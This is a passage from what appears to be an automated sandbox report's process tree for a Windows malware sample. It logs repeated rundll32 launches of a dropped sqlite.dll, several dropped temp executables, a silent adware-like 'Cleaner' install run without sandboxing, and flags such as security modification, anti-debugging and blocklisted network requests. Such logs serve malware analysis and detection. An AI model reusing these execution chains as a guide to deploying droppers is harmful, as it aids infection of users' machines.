                                                                                                                                                                                                                                                                                                                PID:1528
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:2956
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3868 -ip 3868
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                  PID:3476
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5064 -ip 5064
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                  PID:904
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4556 -ip 4556
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                  PID:2140
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1900 -ip 1900
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                  PID:960
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2776 -ip 2776
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                  PID:3400
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2468 -ip 2468
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                  PID:2572
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                  PID:3928
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:1700
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 460
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                        PID:5364
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3428 -ip 3428
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                    PID:3604
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-667DA.tmp\WEATHER Manager.tmp
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-667DA.tmp\WEATHER Manager.tmp" /SL5="$20312,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:3824
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1700 -ip 1700
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                      PID:1240
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      PID:3088
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2680 -ip 2680
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                      PID:6388
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 6156 -ip 6156
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                      PID:6256
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 552 -p 4816 -ip 4816
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                      PID:6904
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F202.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F202.exe
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:6900
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2144 -ip 2144
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                      PID:6748
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                      PID:1180
                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 661820427DBF7B0034B997A99796C1A9 C
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:6324
                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 899433C00B9AB9133A573C9EB71FB5AA
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:5260
                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding CCDB43C13624C589CB9304E9031562D0 C
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:2424
                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding A4B62AE3F9172D6CC89CA517E3D48698 C
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:2940
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:1072
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:908
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:6460
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ffa2433dec0,0x7ffa2433ded0,0x7ffa2433dee0
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                    PID:6116
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1584 /prefetch:2
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:6472
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --mojo-platform-channel-handle=1912 /prefetch:8
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                      • Windows security modification
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                      PID:6400
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --mojo-platform-channel-handle=2268 /prefetch:8
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:2408
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2448 /prefetch:1
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:4480
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2536 /prefetch:1
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:6008
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3188 /prefetch:2
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:5832
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --mojo-platform-channel-handle=1852 /prefetch:8
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:1964
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --mojo-platform-channel-handle=3524 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3308
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --mojo-platform-channel-handle=3728 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3064
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --mojo-platform-channel-handle=3348 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5040
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,11168370736542869321,3890206978111387717,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6460_101419573" --mojo-platform-channel-handle=2868 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1904
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_E958.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6788
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1036 -ip 1036
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                  PID:1440
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6756 -ip 6756
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                  PID:6820
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                  PID:6228
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                    PID:1568
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                  PID:6596
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5340 -ip 5340
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                  PID:4208
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3277.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3277.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                  PID:5340
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 6432 -ip 6432
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                  PID:6228
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 3348 -ip 3348
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                  PID:2076
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                  PID:3512
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                    PID:5684
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 448
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                      PID:6428
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4FA5.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\4FA5.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1524
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 296
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                      PID:6456
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5684 -ip 5684
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                    PID:1572
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\58ED.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\58ED.exe
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    PID:3208
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 280
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                      PID:6128
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 680 -p 828 -ip 828
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                    PID:6736
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1524 -ip 1524
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                    PID:5660
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 3208 -ip 3208
                                                                                                                                                                                                                                                                                                                                                    1⤵
